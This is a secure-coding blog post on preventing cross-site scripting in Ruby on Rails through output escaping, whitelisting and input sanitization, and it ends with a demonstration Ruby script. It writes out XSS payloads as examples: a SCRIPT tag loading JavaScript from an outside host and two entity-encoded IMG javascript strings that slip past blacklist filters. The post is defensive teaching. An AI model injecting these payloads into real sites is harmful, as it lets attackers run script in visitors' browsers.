imedo Development Blog


Secure coding with Ruby on Rails 4: Cross-site scripting (XSS)

A Failure to Preserve Web Page Structure, number four of the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors, is a programming error that makes an application vulnerable to cross-site scripting (XSS). In an XSS attack, an attacker injects malicious content into the output of a web application, for example a reference that loads code from an external resource, and that code is then executed by the client's web browser.

For example, an attacker writes the following piece of code in a forum post. This line loads malicious JavaScript code from an external host, which is executed whenever somebody reads the forum post.


<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

While preventing SQL injection is mainly a matter of sanitizing the input data, preventing XSS is above all a matter of escaping the output of a web application. To achieve this, dynamic content could be displayed as follows.


<%= html_escape("<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>") %>

ERB's output escaper html_escape() has an alias called h(), which makes it easier to use. Those for whom this is still too much overhead, or who want to be sure, should use the Rails plugin SafeERB, which ensures that all strings in an rhtml template are escaped properly.

When using an HTML output escaper it is important to verify that it uses a whitelist, since XSS attacks do not necessarily look like the example above. They can also take the form of the following strings, which are hard to filter with a blacklist. The first attack string uses the IMG tag to insert the malicious JavaScript code, which is encoded in UTF-8. Older browsers like IE6, IE7, and Firefox 2, which are, for several reasons, still in use, are known to support such encodings and treat them as valid HTML code.


<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

This example can also be written the following way, which does not even use the semicolons at the end of a UTF-8 character encoding, since a UTF-8 character is encoded in 7 digits; the syntax with the semicolon is only a short form.


<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

For these and more cross-site scripting attack examples, visit the XSS cheat sheet.

Although they are not direct measures against XSS, input sanitization and input validation can help prevent malicious code from getting into the application in the first place. Using sanitize() and the Ruby on Rails validation methods is therefore highly recommended as part of a defense-in-depth strategy against cross-site scripting. A really useful plugin is acts_as_sanitized, which provides XSS input sanitization.
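As an added illustration (not code from the original post or from Rails), the following Ruby script contrasts a naive blacklist filter with output escaping on the post's three attack strings. It uses only ERB::Util.html_escape from Ruby's standard library, which is the escaper behind the Rails h() helper; browser_decode is an assumed stand-in for the lenient entity decoding the post attributes to older browsers.

```ruby
require "erb"

# The three attack strings from the post, used here as sample input.
SCRIPT_PAYLOAD = "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>"
IMG_ENTITY_PAYLOAD = "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;" \
                     "&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>"
IMG_PADDED_PAYLOAD = "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099" \
                     "&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108" \
                     "&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083" \
                     "&#0000083&#0000039&#0000041>"

# Output escaping: what Rails' h() / html_escape() does. Every '<', '>' and '&'
# becomes an entity, so the browser renders the text instead of parsing it.
def escape_output(text)
  ERB::Util.html_escape(text)
end

# A naive blacklist filter of the kind the post warns against: it strips the
# obvious "<script" and "javascript:" tokens and leaves everything else alone.
def blacklist_filter(text)
  text.gsub(/<\s*script/i, "").gsub(/javascript:/i, "")
end

# Assumed model of a lenient browser: decode numeric character references,
# with or without leading zeros and with or without a trailing semicolon.
def browser_decode(text)
  text.gsub(/&#0*(\d+);?/) { $1.to_i.chr(Encoding::UTF_8) }
end

# True if the markup, decoded the way such a browser decodes it, still carries
# a script tag or a javascript: URL, i.e. the payload would run.
def executes_script?(markup)
  browser_decode(markup).match?(/<script|javascript:/i)
end

if __FILE__ == $0
  [SCRIPT_PAYLOAD, IMG_ENTITY_PAYLOAD, IMG_PADDED_PAYLOAD].each do |payload|
    puts "decoded by browser : #{browser_decode(payload)}"
    puts "blacklist filtered : runs? #{executes_script?(blacklist_filter(payload))}"
    puts "output escaped     : runs? #{executes_script?(escape_output(payload))}"
    puts
  end
end
```

The blacklist catches only the plain SCRIPT tag and passes both entity-encoded IMG strings through untouched, whereas escaping the output neutralizes all three because the leading `&` of every reference becomes `&amp;`.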

Written by tkadauke

October 2nd, 2009 at 9:41 am